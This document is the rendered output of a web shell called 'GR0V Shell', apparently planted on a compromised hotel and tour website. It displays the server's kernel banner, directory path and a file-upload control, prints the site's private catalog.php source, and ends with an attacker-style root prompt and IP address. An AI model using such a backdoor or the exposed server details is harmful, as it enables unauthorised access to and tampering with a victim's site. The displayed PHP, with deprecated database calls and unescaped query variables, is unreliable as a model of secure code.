? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/hotel/
File Upload :
Current File : /home/admin/public_html/old/hotel/catalog.php

<?php
session_start();

include ("config.php");
include ("category.php");
include ("toplink.php");
include("function.php");
@mysql_db_query($dbname,"update ".$fix."user set counter=(counter+1) where userid='1' "); 


if($_GET["gallery"]=="1")
{
if (empty($page)) $page=1;
$nofollow=1;
themehead(_LANG_59." Page:$page");
gallery("gallery","0");
themefoot(); 
mysql_close($connection);
exit;
}



if(is_numeric($_GET["idp"]))  				            $sql = "select * from ".$fix."catalog where idp='".$_GET["idp"]."' and category NOT IN ('L1','LA') ";
elseif(is_numeric($_GET["category"]))   	    $sql = "select * from ".$fix."catalog where category='".$_GET["category"]."' order by idp desc limit 1";  
else{

for($i=0; $i<count($categories); $i++)
{
$data .= "<table width=\"100%\" bgcolor=\"$syscolor2\" cellspacing=1 cellpadding=0><tr><td>\n";
$data .= "<table width=\"100%\" bgcolor=white cellspacing=1 cellpadding=3>\n";
$data .= "<tr><td background=\"$folder/bgbb.gif\" colspan=2>";
$data .= "<font color=\"$color1\"><b>".stripslashes($categories[$i][1])."&nbsp;</b></font></td></tr>\n";
$data .= showallcat2($categories[$i][0],"0",stripslashes($categories[$i][1]))."\n";
$data .= "</table></td></tr></table><br>\n";
}

themehead(_LANG_34);
echo $data;
themefoot(); 
mysql_close($connection);
exit;

}



$result = @mysql_db_query($dbname,$sql);
if(!@mysql_num_rows($result))
{
$nofollow = true;
themehead("The page cannot be found");
echo "<font color=red>"._LANG_36_3."</font>";
themefoot();
exit;
}


$array = mysql_fetch_array($result);
mysql_db_query($dbname,"update ".$fix."catalog set counter=(counter+1) where idp='$array[0]' "); 
$query = mysql_db_query($dbname,"select MAX(idp) from ".$fix."catalog where category='$array[1]'");
$new_idp = @mysql_result($query,0);
$new = ($new_idp==$array[0]) ? "<img src=\"images/new.gif\">" : "";

$categoryname = searchcat_by($array[1]);

if($category)
themehead($categoryname);
else
themehead(stripslashes($array[2]));
echo "<table cellspacing=0 cellpadding=2 width=\"100%\"><tr><td valign=top>";
echo "<iframe src =\"rotator.htm\" FRAMEBORDER=0 width=100% scrolling=no height=100% MARGINWIDTH=0 MARGINHEIGHT=0></iframe></td></tr>";
echo "<tr><td align=\"center\"><b>| ";

//category
if(!ereg("L",$array[1])) {
$querycat = mysql_db_query($dbname,"select * from ".$fix."categories");
//echo "<div align=right><b>";
while ($rowcat=mysql_fetch_array ($querycat)) 
		{ 
			echo "<A HREF=\"catalog.php?category=$rowcat[id]\">".$rowcat[category]."</A> | ";
        }//end while
echo "</b>";
if($_GET["category"] == "1")
	{
echo "<iframe src =\"hoteltop.htm\" FRAMEBORDER=0 width=695 scrolling=no height=900 MARGINWIDTH=0 MARGINHEIGHT=0></iframe></td>";
	}

echo "<div class=\"hr\"><hr /></div>";
}

if( (ereg("L",$array[1])) && (ereg("\[emailform\]",$array[3])) ) 
{
echo "<br><center><script>Hbox('450','$folder','$syscolor3')</script>";
include "mail.php";
echo "<script>Fbox('$folder')</script></center><br>";
}

		
if(!ereg("L",$array[1]))   
{
	//echo "<br><script>Hbox('100%','$folder','$color1')</script>";
if(searchcat_opt($array[1])==1) showallcatp($array[1],$array[0],$categoryname);
else  
showallcatp($array[1],$array[0],$categoryname);                                               
    //echo "<script>Fbox('$folder')</script>";
}

echo "</td></tr></table>";


themefoot();
mysql_close($connection);
?>

T1KUS90T
  root-grov@210.1.60.28:~$